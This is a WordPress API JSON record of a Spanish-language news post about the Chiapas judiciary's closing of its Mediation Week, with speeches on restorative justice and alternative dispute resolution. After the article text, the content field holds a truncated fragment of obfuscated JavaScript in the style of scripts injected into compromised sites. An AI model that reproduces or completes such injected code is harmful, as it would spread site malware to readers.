{"id":24202,"date":"2025-09-27T02:44:04","date_gmt":"2025-09-27T02:44:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24202"},"modified":"2025-09-27T02:44:05","modified_gmt":"2025-09-27T02:44:05","slug":"poder-judicial-concluye-la-semana-de-la-mediacion-la-justicia-es-la-paz-con-ponencias-nacionales-e-internacionales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24202","title":{"rendered":"Poder Judicial concluye la Semana de la Mediaci\u00f3n \u201cLa Justicia es la Paz\u201d con ponencias nacionales e internacionales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" data-id=\"24203\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225-1024x706.jpg\" alt=\"\" class=\"wp-image-24203\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225-1024x706.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225-300x207.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225-768x529.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353225.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"24204\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-1024x683.jpg\" alt=\"\" class=\"wp-image-24204\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353237-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24205\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234-1024x682.jpg\" alt=\"\" class=\"wp-image-24205\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353234.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24206\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228-1024x682.jpg\" alt=\"\" class=\"wp-image-24206\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353228.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"674\" data-id=\"24207\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222-1024x674.jpg\" alt=\"\" class=\"wp-image-24207\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222-1024x674.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222-300x197.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222-768x505.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353222.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24208\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231-1024x682.jpg\" alt=\"\" class=\"wp-image-24208\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000353231.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>26 de septiembre del 2025. El Poder Judicial del Estado de Chiapas realiz\u00f3 la clausura de la Semana de la Mediaci\u00f3n \u201cLa Justicia es la Paz\u201d. El acto protocolario estuvo encabezado por el magistrado presidente, Juan Carlos Moreno Guill\u00e9n, quien destac\u00f3 la importancia de esta capacitaci\u00f3n y de la actualizaci\u00f3n constante, con el fin de contar con una visi\u00f3n m\u00e1s amplia en la impartici\u00f3n de una justicia humana, pronta y cercana.<\/p>\n\n\n\n<p>\u201cEsta semana, sin lugar a dudas, ha constituido un valioso espacio en el que las y los conferencistas compartieron sus conocimientos para fortalecer y ampliar la visi\u00f3n de los Mecanismos Alternativos de Soluci\u00f3n de Controversias. Estoy convencido de que los resultados de esta semana permitir\u00e1n un mejor di\u00e1logo y contribuir\u00e1n de manera significativa a la construcci\u00f3n de una cultura de paz en nuestra sociedad, en nuestra comunidad y estado\u201d, manifest\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>En esta \u00faltima jornada, se cont\u00f3 con la destacada participaci\u00f3n de la magistrada del Tribunal Colegiado del Vig\u00e9simo Circuito del Poder Judicial Federal, Jaqueline \u00c1ngel Juan, as\u00ed como de la acad\u00e9mica argentina Marin\u00e9s Suares, quienes compartieron las ponencias \u201cJuntas Restaurativas en el Sistema Integral de Justicia Penal para Adolescentes\u201d y \u201cEl dilema de la Autocomposici\u00f3n\u201d. Ambos temas resultaron fundamentales para enriquecer la formaci\u00f3n de las y los facilitadores p\u00fablicos que participaron activamente en este encuentro, tanto de manera presencial como virtual.<\/p>\n\n\n\n<p>Este evento reuni\u00f3 a especialistas nacionales e internacionales en torno a los Mecanismos Alternativos de Soluci\u00f3n de Controversias, quienes a lo largo de la semana, desarrollaron 11 ponencias enfocadas en brindar herramientas y generar pr\u00e1cticas de mediaci\u00f3n, orientadas a impulsar la profesionalizaci\u00f3n de quienes contribuyen a la soluci\u00f3n pac\u00edfica de conflictos.<\/p>\n\n\n\n<p>Con la conclusi\u00f3n de la Semana de la Mediaci\u00f3n, el Poder Judicial del Estado refrenda su compromiso con la promoci\u00f3n de una justicia humanista, basada en el respeto irrestricto a los derechos humanos, y orientada a consolidar la cultura del di\u00e1logo como v\u00eda para la soluci\u00f3n pac\u00edfica de los conflictos en beneficio de la sociedad chiapaneca.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 26 de septiembre del 2025. El Poder Judicial del Estado de Chiapas realiz\u00f3 la clausura de la Semana de la Mediaci\u00f3n \u201cLa Justicia es la Paz\u201d. El acto protocolario estuvo encabezado por el magistrado presidente, Juan Carlos Moreno Guill\u00e9n, quien destac\u00f3 la importancia de esta capacitaci\u00f3n y de la actualizaci\u00f3n constante, con el fin &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24207,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24202","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24202","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24202"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24202\/revisions"}],"predecessor-version":[{"id":24209,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24202\/revisions\/24209"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24207"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24202"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24202"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}